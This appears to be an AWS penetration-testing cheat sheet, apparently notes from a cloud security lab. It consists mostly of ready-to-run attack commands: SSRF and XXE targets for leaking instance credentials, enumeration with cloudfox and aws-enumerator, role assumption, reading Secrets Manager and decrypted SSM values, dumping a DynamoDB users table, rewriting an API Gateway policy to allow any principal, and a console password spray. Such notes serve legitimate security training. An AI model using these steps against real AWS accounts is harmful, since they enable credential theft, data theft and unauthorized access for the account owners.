AWS

Authentication

• Run the following command and enter ACCESS KEY ID and SECRET ACCESS KEY

aws configure
aws configure --profile <profile_name>
aws sts get-caller-identity

export AWS_SESSION_TOKEN=
export AWS_SECRET_ACCESS_KEY=
export AWS_ACCESS_KEY_ID=

The credentials we get from CloudShell expire after 15 minutes by default / design. After getting the credentials, you may need to get and set new credentials again as you work through the remainder of the lab.

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"

• SSRF

http://169.254.169.254/

• XXE

file:///proc/self/environ

Note that immediately following the AWS access key is the SHLVL=0 parameter. When you copy the AWS access key ID value, make sure that you don't copy the SHLVL label. Also the AWS session token is in base64 format and you should copy the trailing = or == .

• If new env, use cloudfox

https://github.com/BishopFox/cloudfox/releases
cloudfox aws all-checks -p default

• aws-enum

git clone https://github.com/shabarkin/aws-enumerator.git --depth 1

aws-enumerator cred -aws_access_key_id -aws_region  -aws_secret_access_key 
aws-enumerator enum -services all
aws-enumerator dump -services all

• IAM

aws sts assume-role --role-arn arn:aws:iam::427648302155:role/ExternalCostOpimizeAccess --role-session-name ExternalCostOpimizeAccess

aws sts assume-role --role-arn arn:aws:iam::427648302155:role/ExternalCostOpimizeAccess --role-session-name ExternalCostOpimizeAccess --external-id 37911

aws iam get-role --role-name <role_name>
aws iam list-user-policies --user-name sarah
aws iam list-attached-user-policies --user-name staging_eng
aws iam get-policy --policy-arn arn:aws:iam::115372617301:policy/staging_engineer_policy
aws iam get-policy-version --policy-arn arn:aws:iam::115372617301:policy/staging_engineer_policy --version-id v1
aws apigateway update-rest-api --rest-api-id ai90tno9bj --patch-operations '[{"op":"replace","path":"/policy","value":"{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Principal\":\"*\",\"Action\":\"execute-api:Invoke\",\"Resource\":\"arn:aws:execute-api:us-west-2:115372617301:ai90tno9bj/*/GET/prod\"},{\"Effect\":\"Allow\",\"Principal\":\"*\",\"Action\":\"execute-api:Invoke\",\"Resource\":\"arn:aws:execute-api:us-west-2:115372617301:ai90tno9bj/*/*/dev\"}]}"}]'

• Services

# s3
aws s3 ls s3://<bucket_name> --no-sign-request
aws s3api get-bucket-policy --bucket <bucket_name> | jq -r '.Policy | fromjson'

# api gateway
# ai90tno9bj.execute-api.us-west-2.amazonaws.com : This is the API Gateway hostname, and it contains three key parts:
# ai90tno9bj : The API Gateway ID that uniquely identifies your API Gateway instance in AWS.
# execute-api : AWS’s domain used for API Gateway endpoints.
# us-west-2 : The AWS region where this API Gateway is deployed — in this case, Oregon.
# amazonaws.com : AWS’s root domain.
aws apigateway get-stages --rest-api-id ai90tno9bj
aws apigateway get-rest-apis | cat policy.json | sed 's/\\\\\\//g' | jq
aws apigateway create-deployment --rest-api-id ai90tno9bj --stage-name api

# ec2
aws secretsmanager list-secrets #Get metadata of all secrets
aws secretsmanager describe-secret --secret-id <secret_arn>
aws --profile default --region us-west-2 secretsmanager get-secret-value --secret-id root_account_bd13f7880c73
aws --profile $profile --region us-west-2 ssm get-parameter --with-decryption --name /application/wprod3/admin

# Dynamo db
aws dynamodb list-tables
aws dynamodb scan --table-name analytics_app_users > output.json

• Password spray

go install github.com/WhiteOakSecurity/GoAWSConsoleSpray@latest
./GoAWSConsoleSpray -a 243687662613 -u ../../users -p ../../passwords